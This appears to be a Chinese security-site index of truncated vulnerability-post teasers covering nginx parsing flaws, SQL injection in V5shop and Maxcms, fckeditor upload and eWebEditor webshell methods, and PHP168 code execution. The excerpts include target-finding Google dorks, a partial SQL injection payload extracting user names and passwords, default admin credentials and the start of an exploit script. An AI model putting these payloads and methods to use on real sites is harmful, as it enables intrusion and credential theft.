nginx fastcgi配置失误+解析漏洞引发的漏洞
现在一定还有很多网站用的nginx,自从N个月以前的nginx解析漏洞以来,现在差不多都修复了,一般语句都是这么写的 if ( $fastcgi_script_name ~ ..*/.*php ) { return 403; } 当匹配*/*.php*的时候则返回403 但是有些fastcgi配置的却不只有.php,有些甚至配置了ph*,(网上有一篇文章就是这么写的) 这样.ph*就没法匹配.ph...
V5shop注入漏洞
漏洞危害:高危 一、漏洞文件:cart.aspx 搜索关键词:inurl:scoreindex.aspx exp : /cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as ...
盛大云网站配置不当导致文件解析漏洞及修复
简要描述:盛大云网站存在漏洞,可以直接获得网站权限。 详细说明:nginx文件解析漏洞 漏洞证明:<A href="https://www.webshell.cc/robots.txt/x.<a%20href=" target=_blank http: www.webshell.cc kf web php ?>php">https://www.webshell.cc/robot...
马克斯CMS(Maxcms) admin_inc.asp SQL注入漏洞及修复
在文件admin/ admin_inc.asp中: Sub checkPower //第103行 dim loginValidate,rsObj : loginValidate = "maxcms2.0" err.clear on error resume next set rsObj=conn.db("select m_random,m_level from {pre}manager where...
关于迅雷离线功能存在设计漏洞
本人一直都在共享着自己使用的VIP迅雷账号, 但更新过几次都是在几天之后提示密码错误, 用密保把密码改回来发现安全邮箱被改成@QQ.COM的 E-Mail地址了 用IE8.0更改无法查看“老是提示验证码错误”,用Opera浏览器可看到一半(如图) 我自己从来都没用QQ E-mail做为安全邮箱,进迅雷离线发现原来可以在离线功能处可以更改安全邮箱(如图) PS:共享迅雷VIP账号有风...
fckeditor 2.6.4 任意文件上传漏洞
描述:fckeditor 详细说明:currentfolder过滤不给力啊,但是GPC就能让它脑残!下面是利用工具! 利用: <? error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); define(STDIN, fopen("php://stdin", "r")); $match = arr...
Hishop5.4和5.4.1 漏洞利用
hishop 自从09年 5.1 和5.1.3爆过漏洞之后就没爆了。。 前段时间看了下,找到一个注入点,不过语句有点复杂而且还过滤了下划线(表名当中都有下划线),所以需要特别构造下, 这个注入点再结合iis6就能拿shell了。 前几天看到了toby57大牛dz1.5的exp, 看的我荡漾了,所以下午花了点时间,看了下PHP,学着写了个php的exp。 大牛别笑哈。。 选这种类似的URL 拿she...
eWebEditor5.5 漏洞
作者:脚本小子 Google搜索:inurl:xxhs.asp?classid= 漏洞eWebEditor5.5 拿webshell方法 直接进后台eWebEditor/admin/login.asp 默认账号密码 admin admin 登陆后台点击“样式管理” 在popup样式管理 修改 路径模式:选择绝对路径 图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|c...
PHP168 V6.02 整站系统远程执行任意代码漏洞利用
漏洞出在 inc/function.inc.php 里面 .get_html_url() 这个函数. inc/function.inc.php: function get_html_url(){ global $rsdb,$aid,$fidDB,$webdb,$fid,$page,$showHtml_Type,$Html_Type; $id=$aid; if($page<1){ $page=...
10岁少年女黑客发现社交网络游戏中的农场漏洞
拉斯维加斯Defcon的最新消息,一名化名为CyFi的10岁女黑客,独立安全研究人员宣告了一个iOS和Android设备上的游戏漏洞,她最早在2011年1月份发现了这些漏洞,因为她“对农场的游戏感到厌烦”,因此决定披露它。 这个漏洞可以让玩家更改作物成熟的时间,从而对游戏厂商的正常规则提出挑战。尽管多数游戏开发商会阻止这种“催熟”作物的行为,但CyFi还是表示已经发现了破解的方法。 这名年轻的黑客...